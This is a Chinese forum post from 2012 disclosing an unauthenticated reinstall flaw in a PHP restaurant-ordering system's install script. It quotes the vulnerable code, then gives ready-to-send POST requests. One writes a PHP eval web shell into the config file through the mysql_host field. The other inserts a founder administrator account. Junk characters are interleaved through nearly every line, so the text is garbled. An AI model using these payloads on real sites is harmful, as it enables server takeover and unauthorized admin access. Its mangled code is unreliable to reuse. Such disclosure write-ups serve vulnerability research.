问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
( g' g$ l3 ?8 b) w- M+ V4 m1 c' d% Z, {- L7 }
<?php
1 V# o/ k v/ X. b9 Kif(file_exists("../install.lock"))4 i% _! A2 T) E: p" G2 i/ l- ]
{2 r0 \- e0 s$ V2 r
header("Location: ../");//没有退出* v) Q# {' w+ }4 \7 i, e
}
$ |# L) \5 l) N n5 ?
. F1 g' o0 D, N. S- j/ B$ T: X//echo 'tst';exit;1 z. d* c% B6 \6 U
require_once("init.php");
" R3 D. B+ n. T+ p4 cif(empty($_REQUEST['step']) || $_REQUEST['step']==1)$ L( s+ g- T7 D. y
{$ E- s$ P1 S u2 M
可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。8 ], o; K' f5 ?1 Q* k' z- H/ ?
5 W# v7 k' @" l3 N3 ?; V! c- W- c1、getshell(很危险)
2 C: p1 r/ E9 ]" Cif(empty($_REQUEST['step']) || $_REQUEST['step']==1)
( R' K8 W& g! M q{) ]2 E) K2 h) e5 G4 g
$smarty->assign("step",1);% \; W9 k* F0 @% i% g8 d: { `( T
$smarty->display("index.html");
8 Z( C# E& Q- T3 O}elseif($_REQUEST['step']==2)
/ X' s, Y: ^: p r$ G" w7 ?( R{0 z t1 y9 B8 M# U$ s, M
$mysql_host=trim($_POST['mysql_host']);
5 {4 u6 R9 r: K! q! F# k $mysql_user=trim($_POST['mysql_user']);
- F! V S% y1 }/ S. n $mysql_pwd=trim($_POST['mysql_pwd']);
' r5 W! g! X$ ~3 d* [ $mysql_db=trim($_POST['mysql_db']);
, g4 k& a5 n2 L7 q8 [7 Q! b $tblpre=trim($_POST['tblpre']);
|& J* b1 L7 p( @7 n+ @( M $domain==trim($_POST['domain']);
, [3 Q. ^: s* J$ s; x $str="<?php \r\n";7 c1 b3 P; q2 c& O3 f7 F8 C5 ^
$str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
% F, I# n: B/ X7 b" v2 F% b+ h $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";) \( M# U% e! Y) A V
$str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
1 w& A( i+ a' T' L$ v/ c% y. W $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";5 m, _9 h0 R$ Q( m7 @9 F" `) G! k
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";' _7 v, d' u) l- I4 `
$str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
" H" `' Y; B& M O $str.='define("DOMAIN","'.$domain.'");'."\r\n";4 y- i$ c- c1 |6 S1 U8 Q
$str.='define("SKINS","default");'."\r\n";
- K8 L. ~( O% e+ C- M. o7 n" N $str.='?>';1 B* c3 U0 c1 i4 P
file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件, } }/ C1 ^8 q4 J
上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马6 X7 y9 C- r& _ x p, J
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
0 I ]' q: `$ m% g% C$ NHost: 192.168.80.129
5 |: L- Q R m) r- vUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
+ H6 v. B, y! p% B8 V/ _/ z5 P0 lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
9 h% Q2 p2 j+ w1 u4 u3 j: ]: U6 GAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
) u9 R' c9 [' n# ?Accept-Encoding: gzip, deflate
4 K6 P5 A5 k' @& ?) \, FReferer: http://192.168.80.129/canting/install/index.php?step=1
' k; y' v$ M7 oCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42' X. x. T0 Y4 D# s+ y1 s
Content-Type: application/x-www-form-urlencoded/ w+ _) H7 p7 F" c6 s( |
Content-Length: 1265 N" R8 P4 M- }8 f
2 `5 s/ \" f* h7 ]$ Qmysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD& {' \* O+ S' l7 R, x+ o
但是这个方法很危险,将导致网站无法运行。
& Z0 x! o: w8 H4 N; }, |# a* @5 R/ ~5 x4 O, ?* b) X" H
2、直接添加管理员9 |3 M' i" s" `
$ f4 ^1 |$ N6 n7 A1 J6 B4 y. u4 f/ x
elseif($_REQUEST['step']==5)% \2 ?+ K: _, G1 y$ ?- H
{
8 a% m3 f1 @6 t if($_POST): R% f6 d3 n* C1 \3 u
{ require_once("../config/config.inc.php");6 b* a* _+ M# V
$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
3 T1 Z" g6 L% y" Q, \- M mysql_select_db(MYSQL_DB,$link);
( |$ h$ C7 v; ]- E5 } mysql_query("SET NAMES ".MYSQL_CHARSET );
1 V5 u" c1 Y5 y0 u mysql_query("SET sql_mode=''");
3 Q, P% b Q% }( C2 @8 ~
5 l: \/ R" P! p# r# q $adminname=trim($_POST['adminname']);
6 r' t) g' \4 i0 T7 D $pwd1=trim($_POST['pwd1']);
4 ?# L' x. B7 `) ^0 P" i. R $pwd2=trim($_POST['pwd2']);
) o0 a- P% y3 {% W% G* J if(empty($adminname)): B( \8 j o: O! W. O
{
9 I2 B) V+ ^% d' j1 g" \% W5 c
7 J+ i. n2 i$ l% @/ ~, b2 S$ h& V echo "<script>alert('管理员不能为空');history.go(-1);</script>";
, s) r2 k$ x- W( M3 i6 U' o0 { exit();1 `% d% r. R3 x& v9 R
}
9 a( A; j7 a$ V4 v! L& E6 O4 x. f$ r if(($pwd1!=$pwd2) or empty($pwd1))
8 Z" ~" I8 H; e+ a. \ {
# V; ~& l, ^! q' m+ h echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出. I6 X5 U1 K! D
}
5 \; ~/ \" z/ E mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
]5 I# q0 L }( S6 c k T: h* ], i }: b( a" o# ^; \2 ]3 z `$ ^( q
这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:
4 H9 x1 g, v l4 O8 `6 V6 {POST /canting/install/index.php?m=index&step=5 HTTP/1.13 _6 w) a0 }6 Z* f
Host: 192.168.80.1295 t/ q4 `5 b; W4 B" a3 {
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.07 p! L; x4 c/ ^) d4 C0 v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8* O; g4 F8 w7 _/ ]
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3% A0 V8 ?5 L- Y
Accept-Encoding: gzip, deflate6 E) q3 B" o, s( p5 a
Referer: http://www.2cto.com /canting/install/index.php?step=1
9 M7 ~ Q C' w5 X( F9 I$ G: kCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
% u1 v$ Q# X2 |% z1 ]Content-Type: application/x-www-form-urlencoded4 h3 ?( w; G0 {, _% v/ I( ~0 `
Content-Length: 46
5 P9 a+ T! o0 u, z' y1 \ K . n t% j3 S- X, h3 M' \/ R$ z
adminname=qingshen&pwd1=qingshen&pwd2=qingshen+ N9 u3 X% c: h4 I- @7 f: E9 l
|
发表于 2012-12-4 11:13:44
收藏
支持
反对